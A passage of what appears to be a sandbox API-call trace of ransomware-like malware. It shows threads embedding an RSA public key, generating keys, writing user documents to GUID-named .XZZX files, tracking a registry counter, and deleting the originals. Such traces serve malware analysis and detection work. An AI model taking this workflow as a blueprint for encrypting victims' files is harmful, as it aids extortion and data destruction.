lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0035.285] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c5 [0035.285] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0035.285] SetFilePointer (in: hFile=0x3e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4ca [0035.285] SetErrorMode (uMode=0x1) returned 0x1 [0035.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.285] OutputDebugStringW (lpOutputString="end") [0035.286] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w0Íâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.286] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0035.286] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3eafe0) returned 1 [0035.286] CryptImportPublicKeyInfo (in: hCryptProv=0x3eafe0, dwCertEncodingType=0x1, pInfo=0x3dd1978*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd19a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd19b0*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x324b38) returned 1 [0035.286] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.287] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.287] CryptEncrypt (in: hKey=0x324b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0035.287] CryptEncrypt (in: hKey=0x324b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb068*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb068*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0035.287] WriteFile (in: hFile=0x3e4, lpBuffer=0x3eb068*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb068*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0035.287] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.287] WriteFile (in: hFile=0x3e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0035.287] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0035.288] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.288] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x3fc) returned 0x0 [0035.288] RegQueryValueExW (in: hKey=0x3fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0xa, lpcbData=0x417dfdc*=0x4) returned 0x0 [0035.288] RegCloseKey (hKey=0x3fc) returned 0x0 [0035.288] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x3fc) returned 0x0 [0035.288] RegSetValueExW (in: hKey=0x3fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0xb, cbData=0x4 | out: lpData=0x417dfec*=0xb) returned 0x0 [0035.288] RegCloseKey (hKey=0x3fc) returned 0x0 [0035.288] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.289] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.289] CloseHandle (hObject=0x3e4) returned 1 [0035.289] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0035.290] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0035.290] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact")) returned 1 [0035.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact")) returned 0 Thread: id = 102 os_tid = 0x5f8 [0035.239] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.239] lstrcpyW (in: lpString1=0x42cf460, lpString2="sikvnb huvuib.contact" | out: lpString1="sikvnb huvuib.contact") returned="sikvnb huvuib.contact" [0035.239] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0035.239] SetErrorMode (uMode=0x1) returned 0x1 [0035.239] lstrcpyW (in: lpString1=0x42cf860, lpString2="sikvnb huvuib.contact" | out: lpString1="sikvnb huvuib.contact") returned="sikvnb huvuib.contact" [0035.239] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x42ef3280, Data2=0x2fd0, Data3=0x4413, Data4=([0]=0xa4, [1]=0xba, [2]=0x96, [3]=0xf3, [4]=0xe4, [5]=0xa5, [6]=0x44, [7]=0xba))) returned 0x0 [0035.239] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0035.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0035.239] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned 80 [0035.240] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="XZZX") returned 0x0 [0035.240] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x20) returned 1 [0035.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e4 [0035.240] ReadFile (in: hFile=0x3e4, lpBuffer=0x3e153d0, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e153d0*, lpNumberOfBytesRead=0x42ce418*=0x494, lpOverlapped=0x0) returned 1 [0035.241] CloseHandle (hObject=0x3e4) returned 1 [0035.241] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0035.242] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0035.242] SetErrorMode (uMode=0x1) returned 0x1 [0035.242] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0035.242] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eaf58) returned 1 [0035.245] CryptGenKey (in: hProv=0x3eaf58, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324bb8) returned 1 [0035.369] CryptExportKey (in: hKey=0x324bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.369] CryptExportKey (in: hKey=0x324bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x42ce41c | out: pbData=0x3ec0000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.369] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.369] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.369] CryptDestroyKey (hKey=0x324bb8) returned 1 [0035.369] CryptReleaseContext (hProv=0x3eaf58, dwFlags=0x0) returned 0 [0035.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4C9E88000CB6CC7042EF328010E3B0B8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\4c9e88000cb6cc7042ef328010e3b0b8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0035.370] WriteFile (in: hFile=0x3f0, lpBuffer=0x3e153d0*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e153d0*, lpNumberOfBytesWritten=0x42ce438*=0x494, lpOverlapped=0x0) returned 1 [0035.370] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x494 [0035.370] WriteFile (in: hFile=0x3f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.370] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x499 [0035.370] WriteFile (in: hFile=0x3f0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2a, lpOverlapped=0x0) returned 1 [0035.371] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c3 [0035.371] WriteFile (in: hFile=0x3f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.371] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c8 [0035.371] SetErrorMode (uMode=0x1) returned 0x1 [0035.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.371] OutputDebugStringW (lpOutputString="end") [0035.371] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w0Íâ\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.371] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0035.371] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3eb0f0) returned 1 [0035.372] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb0f0, dwCertEncodingType=0x1, pInfo=0x3dd1708*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1738*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1740*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x324bb8) returned 1 [0035.372] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.372] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.372] CryptEncrypt (in: hKey=0x324bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0035.372] CryptEncrypt (in: hKey=0x324bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb178*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb178*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0035.372] WriteFile (in: hFile=0x3f0, lpBuffer=0x3eb178*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3eb178*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0035.372] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.372] WriteFile (in: hFile=0x3f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.372] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0035.373] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.373] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x3d8) returned 0x0 [0035.373] RegQueryValueExW (in: hKey=0x3d8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0xb, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0035.373] RegCloseKey (hKey=0x3d8) returned 0x0 [0035.373] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x3d8) returned 0x0 [0035.373] RegSetValueExW (in: hKey=0x3d8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0xc, cbData=0x4 | out: lpData=0x42cdfec*=0xc) returned 0x0 [0035.373] RegCloseKey (hKey=0x3d8) returned 0x0 [0035.373] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.373] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.374] CloseHandle (hObject=0x3f0) returned 1 [0035.374] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0035.374] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0035.375] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact")) returned 1 [0035.375] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact")) returned 0 Thread: id = 103 os_tid = 0x550 [0035.541] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.541] lstrcpyW (in: lpString1=0x3f8f460, lpString2="4geU.pptx" | out: lpString1="4geU.pptx") returned="4geU.pptx" [0035.541] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.541] SetErrorMode (uMode=0x1) returned 0x1 [0035.541] lstrcpyW (in: lpString1=0x3f8f860, lpString2="4geU.pptx" | out: lpString1="4geU.pptx") returned="4geU.pptx" [0035.541] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x58a0b108, Data2=0x522f, Data3=0x4c23, Data4=([0]=0xaa, [1]=0x49, [2]=0xc6, [3]=0x28, [4]=0x15, [5]=0xe5, [6]=0x52, [7]=0x8))) returned 0x0 [0035.541] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4geU.pptx") returned 53 [0035.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0035.541] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BE3510781871306D58A0B1081C6A14B5.XZZX") returned 81 [0035.541] StrStrW (lpFirst="4geU.pptx", lpSrch="XZZX") returned 0x0 [0035.541] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4geU.pptx", dwFileAttributes=0x20) returned 1 [0035.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4geU.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4geu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0035.542] ReadFile (in: hFile=0x428, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0x4ddd, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x3f8e418*=0x4ddd, lpOverlapped=0x0) returned 1 [0035.542] CloseHandle (hObject=0x428) returned 1 [0035.542] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0035.543] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0035.543] SetErrorMode (uMode=0x1) returned 0x1 [0035.543] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0035.543] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb200) returned 1 [0035.545] CryptGenKey (in: hProv=0x3eb200, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0035.734] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0035.734] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0035.735] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.735] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.735] CryptDestroyKey (hKey=0x324c38) returned 1 [0035.735] CryptReleaseContext (hProv=0x3eb200, dwFlags=0x0) returned 1 [0035.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BE3510781871306D58A0B1081C6A14B5.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\be3510781871306d58a0b1081c6a14b5.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0035.736] WriteFile (in: hFile=0x434, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0x4ddd, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x3f8e438*=0x4ddd, lpOverlapped=0x0) returned 1 [0035.736] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4ddd [0035.736] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.736] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4de2 [0035.736] WriteFile (in: hFile=0x434, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, 